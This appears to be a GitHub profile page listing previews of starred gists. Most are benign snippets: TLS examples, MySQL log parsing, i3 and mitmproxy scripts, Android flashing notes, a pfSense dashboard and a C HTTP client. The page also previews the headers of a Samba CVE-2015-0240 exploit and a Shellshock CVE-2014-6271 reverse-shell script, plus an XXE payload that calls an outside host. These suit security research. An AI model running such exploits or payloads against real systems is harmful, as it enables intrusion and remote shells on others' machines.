Skip to content

Instantly share code, notes, and snippets.

View kost's full-sized avatar
💭
I'm upto something

kost kost

💭
I'm upto something
553 followers · 178 following
  • Diverto
  • Zagreb, Croatia
  • X @k0st
View GitHub Profile
@worawit
worawit / cve-2015-0240_samba_exploit.py
Created April 10, 2015 14:48
Exploit for Samba vulnerabilty (CVE-2015-0240)
#!/usr/bin/python
"""
Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya
The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
in libtalloc does not write a value on 'creds' address.
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
@denji
denji / golang-tls.md
Last active July 22, 2025 05:41 — forked from spikebike/client.go
Simple Golang HTTPS/TLS Examples

Moved to git repository: https://github.com/denji/golang-tls

Generate private key (.key)
# Key considerations for algorithm "RSA" ≥ 2048-bit
openssl genrsa -out server.key 2048

# Key considerations for algorithm "ECDSA" ≥ secp384r1
# List ECDSA the supported curves (openssl ecparam -list_curves)
@mjpowersjr
mjpowersjr / gist:740a9583e9ec8b49e0a3
Last active May 2, 2024 01:26
Parsing the MySQL slow query log via Logstash (the easy way?)

The MySQL slow query log is a difficult format to extract information from. After looking at various examples with mixed results, I realized that it's much easier to configure MySQL to write the slow query log to a table in CSV format!

From the MySQL documentation:

By default, the log tables use the CSV storage engine that writes data in comma-separated values format. For users who have access to the .CSV files that contain log table data, the files are easy to import into other programs such as spreadsheets that can process CSV input.

my.cnf

Note: don't forget to open up permissions on your slow query log CSV file so logstash can read it!

# enable slow query log
@97-109-107
97-109-107 / cycle-workspace.py
Created February 3, 2015 13:28
#!/usr/bin/env python
import i3
outputs = i3.get_outputs()
workspaces = i3.get_workspaces()
# figure out what is on, and what is currently on your screen.
workspace = list(filter(lambda s: s['focused']==True, workspaces))
output = list(filter(lambda s: s['active']==True, outputs))
@nderkach
nderkach / read_mitmproxy_dumpfile.py
Last active March 23, 2025 19:19
Read a mitmproxy dump file and generate a curl command
#!/usr/bin/env python
#
# Simple script showing how to read a mitmproxy dump file
#
### UPD: this feature is now avaiable in mitmproxy: https://github.com/mitmproxy/mitmproxy/pull/619
from libmproxy import flow
import json, sys
@eyecatchup
eyecatchup / hammerhead-from-lrx21o-to-lrx22c.md
Last active November 1, 2023 08:35
A step-by-step guide how to manually flash the Android 5.0.1 (LRX22C) OTA-Update on a Nexus 5 with modified system (custom recovery/kernel, rooted, modified framework etc.)..

Update: For those interested, here's the version for updating from Android 5.1.0 (LMY47D/LMY47I) to Android 5.1.1 (LMY48B):
https://gist.github.com/eyecatchup/dab5cf7977008e504213

  UPDATE `NEXUS 5` 
     SET `VERSION`='5.0.1', `BUILD`='LRX22C', `RECOVERY`='CUSTOM', `ROOTED`=1 
   WHERE `VERSION`='5.0' && `BUILD`='LRX21O' && `RECOVERY`='CUSTOM' && `ROOTED`=1 
         && `WANNA_KEEP_USERDATA`=1;
@staaldraad
staaldraad / XXE_payloads
Last active July 31, 2025 23:05
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@elijahpaul
elijahpaul / pfsense_kibana_dash_v1.json
Created October 12, 2014 15:58
pfSense firewall dashboard (Kibana)
{
"title": "PFSense Firewall",
"services": {
"query": {
"idQueue": [],
"list": {
"0": {
"query": "tags: \"PFSense\" AND action: \"pass\"",
"alias": "Passed",
"color": "#6ED0E0",
@chomy
chomy / httpclient.c
Created October 2, 2014 07:27
HTTP Client in C
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
#include <errno.h>
#define GNU_SOURCE
#include <signal.h>
@infoslack
infoslack / cve-2014-6271.py
Last active April 5, 2019 14:45
CVE-2014-6271 cgi-bin reverse shell
# CVE-2014-6271 cgi-bin reverse shell
# Original: http://pastebin.com/raw.php?i=166f8Rjx
import httplib,urllib,sys
if (len(sys.argv)<3):
print "Usage: %s <host> <vulnerable CGI>" % sys.argv[0]
print "Example: %s localhost /cgi-bin/test.cgi" % sys.argv[0]
exit(0)
conn = httplib.HTTPConnection(sys.argv[1])